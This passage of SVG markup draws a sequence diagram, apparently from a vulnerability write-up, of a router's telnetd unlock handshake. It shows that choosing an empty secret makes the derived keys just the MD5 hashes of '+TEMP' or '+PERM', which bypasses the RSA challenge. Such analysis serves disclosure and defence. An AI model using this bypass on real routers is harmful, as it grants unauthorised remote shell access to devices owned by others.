1364.353876239 L 1023.2232196266808 1392.123721849 L 955.3651097130141 1392.123721849" stroke-miterlimit="10" stroke-width="1.7801183083333332" stroke-dasharray=""/><g transform="translate(937.7775408266808,1392.123721849) translate(-937.7775408266808,-1392.123721849)"><path fill="black" stroke="none" paint-order="stroke fill markers" d=" M 955.5787239100141 1383.2231303073333 L 937.7775408266808 1392.123721849 L 955.5787239100141 1401.0243133906667 Z"/></g></g><g><g><rect fill="white" stroke="none" x="973.735930655014" y="1424.165851399" width="579.8917594976465" height="27.769845609999997"/></g><g><rect fill="white" stroke="none" x="973.735930655014" y="1445.527271099" width="558.4917388982813" height="27.769845609999997"/></g><g><rect fill="white" stroke="none" x="973.735930655014" y="1466.888690799" width="496.92508850765626" height="27.769845609999997"/></g><g><rect fill="white" stroke="none" x="973.735930655014" y="1488.250110499" width="6.408425909999999" height="27.769845609999997"/></g><g><rect fill="white" stroke="none" x="973.735930655014" y="1509.6115301989998" width="546.3250976629297" height="27.769845609999997"/></g><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="976.940143610014" y="1443.391129129" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">Encrypt </text><text fill="blue" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="1060.2068138370648" y="1443.391129129" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">SECRET_PLAINTEXT</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="1256.8901481876508" y="1443.391129129" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve"> with </text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="bold" text-decoration="normal" x="1312.0234833011762" y="1443.391129129" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">RSA_public_encrypt()</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="976.940143610014" y="1464.752548829" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">using the hardcoded, 1024-bit public RSA key, with the</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="bold" text-decoration="normal" x="976.940143610014" y="1486.113968529" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">RSA_NO_PADDING</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="1178.0401497135297" y="1486.113968529" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve"> option set ("Textbook RSA").</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="976.940143610014" y="1507.475388229" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve"></text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="976.940143610014" y="1528.8368079289999" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">Store the 128-byte result as </text><text fill="blue" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="1263.690143610014" y="1528.8368079289999" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">CHALLENGE_CIPHERTEXT</text></g><g><path fill="none" stroke="black" paint-order="fill stroke markers" d=" M 937.7775408266808 1537.381375809 L 1033.9039294766808 1537.381375809 L 1033.9039294766808 1565.151221419 L 966.0458195630141 1565.151221419" stroke-miterlimit="10" stroke-width="1.7801183083333332" stroke-dasharray=""/><g transform="translate(948.4582506766808,1565.151221419) translate(-948.4582506766808,-1565.151221419)"><path fill="black" stroke="none" paint-order="stroke fill markers" d=" M 966.2594337600141 1556.2506298773333 L 948.4582506766808 1565.151221419 L 966.2594337600141 1574.0518129606667 Z"/></g></g><g><g><rect fill="white" stroke="none" x="259.2775241008883" y="1597.193350969" width="503.39176331234376" height="27.769845609999997"/></g><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="262.4817370558883" y="1616.418628699" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">Send 128-byte </text><text fill="blue" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="415.6150683547164" y="1616.418628699" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">CHALLENGE_CIPHERTEXT</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="668.7817401076461" y="1616.418628699" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve"> to Client</text></g><g><path fill="none" stroke="black" paint-order="fill stroke markers" d=" M 927.0968309766808 1624.963196579 L 112.4375494237728 1624.963196579" stroke-miterlimit="10" stroke-width="1.7801183083333332" stroke-dasharray="8.544567879999999"/><g transform="translate(94.84998053743945,1624.963196579) translate(-94.84998053743945,-1624.963196579)"><path fill="black" stroke="none" paint-order="stroke fill markers" d=" M 112.65116362077279 1616.0626050373332 L 94.84998053743945 1624.963196579 L 112.65116362077279 1633.8637881206666 Z"/></g></g><g><g><rect fill="white" stroke="none" x="973.735930655014" y="1657.005326129" width="483.17508993816773" height="27.769845609999997"/></g><g><rect fill="white" stroke="none" x="973.735930655014" y="1678.366745829" width="503.9584117956201" height="27.769845609999997"/></g><g><rect fill="white" stroke="none" x="973.735930655014" y="1699.7281655289999" width="185.5917540617029" height="27.769845609999997"/></g><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="bold" text-decoration="normal" x="976.940143610014" y="1676.230603859" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">XOR</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="1024.0401420841351" y="1676.230603859" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve"> </text><text fill="blue" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="1030.3901419887677" y="1676.230603859" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">SECRET_PLAINTEXT</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="1227.0734763393536" y="1676.230603859" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve"> with the first 31 bytes</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="976.940143610014" y="1697.592023559" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">of </text><text fill="blue" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="1002.5568104038373" y="1697.592023559" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">DECRYPTED_XOR_MASK</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="1240.5234699497357" y="1697.592023559" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">, and store the result in</text><text fill="blue" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="976.940143610014" y="1718.9534432589999" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">MASKED_SECRET</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="1149.7734718570844" y="1718.9534432589999" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">.</text></g><g><path fill="none" stroke="black" paint-order="fill stroke markers" d=" M 948.4582506766808 1727.498011139 L 1033.9039294766808 1727.498011139 L 1033.9039294766808 1755.267856749 L 966.0458195630141 1755.267856749" stroke-miterlimit="10" stroke-width="1.7801183083333332" stroke-dasharray=""/><g transform="translate(948.4582506766808,1755.267856749) translate(-948.4582506766808,-1755.267856749)"><path fill="black" stroke="none" paint-order="stroke fill markers" d=" M 966.2594337600141 1746.3672652073333 L 948.4582506766808 1755.267856749 L 966.2594337600141 1764.1684482906667 Z"/></g></g><g><g><rect fill="white" stroke="none" x="130.8083703657728" y="1787.309986299" width="450.4417511053125" height="27.769845609999997"/></g><g><rect fill="white" stroke="none" x="130.8083703657728" y="1808.671405999" width="475.2084289617578" height="27.769845609999997"/></g><g><rect fill="white" stroke="none" x="130.8083703657728" y="1830.0328256989999" width="375.8917571134607" height="27.769845609999997"/></g><g><rect fill="white" stroke="none" x="130.8083703657728" y="1851.3942453989998" width="6.408425909999999" height="27.769845609999997"/></g><g><rect fill="white" stroke="none" x="130.8083703657728" y="1872.7556650989998" width="457.04175720882813" height="27.769845609999997"/></g><g><rect fill="white" stroke="none" x="130.8083703657728" y="1894.1170847989997" width="157.77508841228882" height="27.769845609999997"/></g><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="134.0125833207728" y="1806.535264029" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">We no longer need to be able to decrypt the</text><text fill="blue" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="134.0125833207728" y="1827.896683729" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">CHALLENGE_CIPHERTEXT</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="387.1792550737025" y="1827.896683729" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">, and so we no longer</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="134.0125833207728" y="1849.258103429" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">have any need of the </text><text fill="darkblue" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="bold" text-decoration="normal" x="353.6792550737025" y="1849.258103429" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">PRIVATE KEY</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="497.14591461960094" y="1849.258103429" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">.</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="134.0125833207728" y="1870.6195231289998" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve"></text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="134.0125833207728" y="1891.9809428289998" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">We can simply set </text><text fill="blue" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="322.34591156784313" y="1891.9809428289998" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">SECRET_PLAINTEXT</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="519.0292459184291" y="1891.9809428289998" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve"> to the</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="bold" text-decoration="normal" x="134.0125833207728" y="1913.3423625289997" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">empty string</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="279.02924591842907" y="1913.3423625289997" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">.</text></g><g><path fill="none" stroke="black" paint-order="fill stroke markers" d=" M 94.84998053743945 1921.8869304090001 L 190.97636918743945 1921.8869304090001 L 190.97636918743945 1949.656776019 L 123.1182592737728 1949.656776019" stroke-miterlimit="10" stroke-width="1.7801183083333332" stroke-dasharray="8.544567879999999"/><g transform="translate(105.53069038743945,1949.656776019) translate(-105.53069038743945,-1949.656776019)"><path fill="black" stroke="none" paint-order="stroke fill markers" d=" M 123.33187347077279 1940.7561844773334 L 105.53069038743945 1949.656776019 L 123.33187347077279 1958.5573675606668 Z"/></g></g><g><g><rect fill="white" stroke="none" x="984.416640505014" y="1981.6989055690003" width="340.0250946111719" height="27.769845609999997"/></g><g><rect fill="white" stroke="none" x="984.416640505014" y="2003.0603252690003" width="627.508409125332" height="27.769845609999997"/></g><g><rect fill="white" stroke="none" x="984.416640505014" y="2024.4217449690002" width="586.8917456693689" height="27.769845609999997"/></g><g><rect fill="white" stroke="none" x="984.416640505014" y="2045.7831646690001" width="137.67508850765626" height="27.769845609999997"/></g><g><rect fill="white" stroke="none" x="984.416640505014" y="2067.1445843690003" width="6.408425909999999" height="27.769845609999997"/></g><g><rect fill="white" stroke="none" x="984.416640505014" y="2088.5060040690005" width="589.0584198064844" height="27.769845609999997"/></g><g><rect fill="white" stroke="none" x="984.416640505014" y="2109.8674237690007" width="620.708417517666" height="27.769845609999997"/></g><g><rect fill="white" stroke="none" x="984.416640505014" y="2131.228843469001" width="509.0584150381128" height="27.769845609999997"/></g><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="987.620853460014" y="2000.9241832990003" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">Create two new strings by calling</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="bold" text-decoration="normal" x="987.620853460014" y="2022.2856029990003" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">sprintf(</text><text fill="blue" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="1072.1875191094282" y="2022.2856029990003" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">RAW_TEMP_KEY</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="1229.7708473564985" y="2022.2856029990003" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">, "</text><text fill="purple" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="bold" text-decoration="normal" x="1251.6708469750288" y="2022.2856029990003" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">%s</text><text fill="red" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="1283.604179418266" y="2022.2856029990003" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">+TEMP</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="1354.5208435418012" y="2022.2856029990003" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">", </text><text fill="blue" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="1376.4208431603315" y="2022.2856029990003" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">MASKED_SECRET</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="bold" text-decoration="normal" x="1549.2541714074018" y="2022.2856029990003" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">)</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="1558.3875046135786" y="2022.2856029990003" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">, and</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="bold" text-decoration="normal" x="987.620853460014" y="2043.6470226990002" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">sprintf(</text><text fill="blue" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="1072.1875191094282" y="2043.6470226990002" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">RAW_PERM_KEY</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="1231.4541817070844" y="2043.6470226990002" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">, "</text><text fill="purple" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="bold" text-decoration="normal" x="1253.3541813256147" y="2043.6470226990002" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">%s</text><text fill="red" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="1285.287513768852" y="2043.6470226990002" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">+PERM</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="1357.8875122429731" y="2043.6470226990002" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">", </text><text fill="blue" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="1379.7875118615034" y="2043.6470226990002" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">MASKED_SECRET</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="bold" text-decoration="normal" x="1552.6208401085737" y="2043.6470226990002" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">)</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="1561.7541733147505" y="2043.6470226990002" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">,</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="987.620853460014" y="2065.008442399" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">respectively. </text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="987.620853460014" y="2086.3698620990003" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve"></text><text fill="red" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="bold" text-decoration="normal" x="987.620853460014" y="2107.7312817990005" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">Note that if </text><text fill="blue" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="1124.5375252129438" y="2107.7312817990005" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">MASKED_SECRET</text><text fill="red" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="bold" text-decoration="normal" x="1297.3708534600141" y="2107.7312817990005" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve"> begins with a null byte,</text><text fill="red" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="bold" text-decoration="normal" x="987.620853460014" y="2129.0927014990007" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">then the strings </text><text fill="blue" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="1176.1208534600141" y="2129.0927014990007" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">RAW_TEMP_KEY</text><text fill="red" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="bold" text-decoration="normal" x="1333.7041817070844" y="2129.0927014990007" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve"> and  </text><text fill="blue" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="1396.654182470024" y="2129.0927014990007" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">RAW_PERM_KEY</text><text fill="red" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="bold" text-decoration="normal" x="1555.9208450676801" y="2129.0927014990007" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve"> will</text><text fill="red" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="bold" text-decoration="normal" x="987.620853460014" y="2150.454121199001" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">just be </text><text fill="darkred" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="bold" text-decoration="normal" x="1071.987522161186" y="2150.454121199001" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">"+TEMP"</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="bold" text-decoration="normal" x="1171.4375191094282" y="2150.454121199001" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve"> </text><text fill="red" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="bold" text-decoration="normal" x="1178.404185807884" y="2150.454121199001" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">and</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="bold" text-decoration="normal" x="1220.4541850449446" y="2150.454121199001" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve"> </text><text fill="darkred" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="bold" text-decoration="normal" x="1227.4208517434004" y="2150.454121199001" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">"+PERM"</text><text fill="red" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="bold" text-decoration="normal" x="1328.6208486916425" y="2150.454121199001" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">, respectively!</text></g><g><path fill="none" stroke="black" paint-order="fill stroke markers" d=" M 948.4582506766808 2158.998689079 L 1044.5846393266806 2158.998689079 L 1044.5846393266806 2186.7685346890003 L 976.7265294130141 2186.7685346890003" stroke-miterlimit="10" stroke-width="1.7801183083333332" stroke-dasharray=""/><g transform="translate(959.1389605266808,2186.7685346890003) translate(-959.1389605266808,-2186.7685346890003)"><path fill="black" stroke="none" paint-order="stroke fill markers" d=" M 976.940143610014 2177.867943147334 L 959.1389605266808 2186.7685346890003 L 976.940143610014 2195.6691262306667 Z"/></g></g><g><g><rect fill="white" stroke="none" x="984.416640505014" y="2218.8106642390003" width="669.8250824041406" height="27.769845609999997"/></g><g><rect fill="white" stroke="none" x="984.416640505014" y="2240.1720839390005" width="595.1917487211267" height="27.769845609999997"/></g><g><rect fill="white" stroke="none" x="984.416640505014" y="2261.5335036390006" width="131.32509003353516" height="27.769845609999997"/></g><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="987.620853460014" y="2238.0359419690003" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">Compute the </text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="bold" text-decoration="normal" x="1124.3708534600141" y="2238.0359419690003" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">MD5</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="1174.7875213982466" y="2238.0359419690003" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve"> hashes of </text><text fill="blue" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="1283.8541870476606" y="2238.0359419690003" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">RAW_TEMP_KEY</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="1441.437515294731" y="2238.0359419690003" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve"> and </text><text fill="blue" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="1491.7708473564985" y="2238.0359419690003" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">RAW_PERM_KEY</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="987.620853460014" y="2259.3973616690005" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">and store the 16-byte results as </text><text fill="blue" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="1313.7708473564985" y="2259.3973616690005" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">TEMP_KEY</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="1415.9041786553266" y="2259.3973616690005" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve"> and </text><text fill="blue" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="1466.2375107170942" y="2259.3973616690005" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">PERM_KEY</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="1570.0541763665083" y="2259.3973616690005" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">,</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="987.620853460014" y="2280.7587813690006" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">respectively.</text></g><g><path fill="none" stroke="black" paint-order="fill stroke markers" d=" M 959.1389605266808 2289.303349249 L 1044.5846393266806 2289.303349249 L 1044.5846393266806 2317.073194859 L 976.7265294130141 2317.073194859" stroke-miterlimit="10" stroke-width="1.7801183083333332" stroke-dasharray=""/><g transform="translate(959.1389605266808,2317.073194859) translate(-959.1389605266808,-2317.073194859)"><path fill="black" stroke="none" paint-order="stroke fill markers" d=" M 976.940143610014 2308.1726033173336 L 959.1389605266808 2317.073194859 L 976.940143610014 2325.9737864006665 Z"/></g></g><g><g><rect fill="white" stroke="none" x="141.4890802157728" y="2349.115324409" width="496.85843811703126" height="27.769845609999997"/></g><g><rect fill="white" stroke="none" x="141.4890802157728" y="2370.4767441090003" width="318.9750948972742" height="27.769845609999997"/></g><g><rect fill="white" stroke="none" x="141.4890802157728" y="2391.8381638090004" width="6.408425909999999" height="27.769845609999997"/></g><g><rect fill="white" stroke="none" x="141.4890802157728" y="2413.1995835090006" width="488.59174881649415" height="27.769845609999997"/></g><g><rect fill="white" stroke="none" x="141.4890802157728" y="2434.561003209001" width="370.7084327764551" height="27.769845609999997"/></g><g><rect fill="white" stroke="none" x="141.4890802157728" y="2455.922422909001" width="489.37509117794434" height="27.769845609999997"/></g><g><rect fill="white" stroke="none" x="141.4890802157728" y="2477.283842609001" width="529.9750991888086" height="27.769845609999997"/></g><g><rect fill="white" stroke="none" x="141.4890802157728" y="2498.6452623090013" width="527.6250778265039" height="27.769845609999997"/></g><g><rect fill="white" stroke="none" x="141.4890802157728" y="2520.0066820090015" width="138.64176331234376" height="27.769845609999997"/></g><g><rect fill="white" stroke="none" x="141.4890802157728" y="2541.3681017090016" width="6.408425909999999" height="27.769845609999997"/></g><g><rect fill="white" stroke="none" x="141.4890802157728" y="2562.729521409002" width="558.4251075811426" height="27.769845609999997"/></g><g><rect fill="white" stroke="none" x="141.4890802157728" y="2584.090941109002" width="540.40842591" height="27.769845609999997"/></g><g><rect fill="white" stroke="none" x="141.4890802157728" y="2605.452360809002" width="72.47509155941407" height="27.769845609999997"/></g><g><rect fill="white" stroke="none" x="141.4890802157728" y="2626.8137805090023" width="6.408425909999999" height="27.769845609999997"/></g><g><rect fill="white" stroke="none" x="141.4890802157728" y="2648.1752002090025" width="292.0917616910974" height="27.769845609999997"/></g><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="144.6932931707728" y="2368.340602139" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">The Client is now expected to append one of two</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="144.6932931707728" y="2389.7020218390003" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">suffixes to </text><text fill="blue" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="253.8432946966517" y="2389.7020218390003" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">SECRET_PLAINTEXT</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="450.52662904723763" y="2389.7020218390003" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">:</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="144.6932931707728" y="2411.0634415390005" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve"></text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="144.6932931707728" y="2432.4248612390006" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">- "</text><text fill="red" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="167.4599595831263" y="2432.4248612390006" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">+TEMP</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="238.37662370666146" y="2432.4248612390006" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">", to launch a </text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="bold" text-decoration="normal" x="378.5099550054896" y="2432.4248612390006" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">telnetd</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="460.17661912902474" y="2432.4248612390006" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve"> session that will</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="144.6932931707728" y="2453.786280939001" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">   last until the router is rebooted, </text><text fill="black" stroke="none" 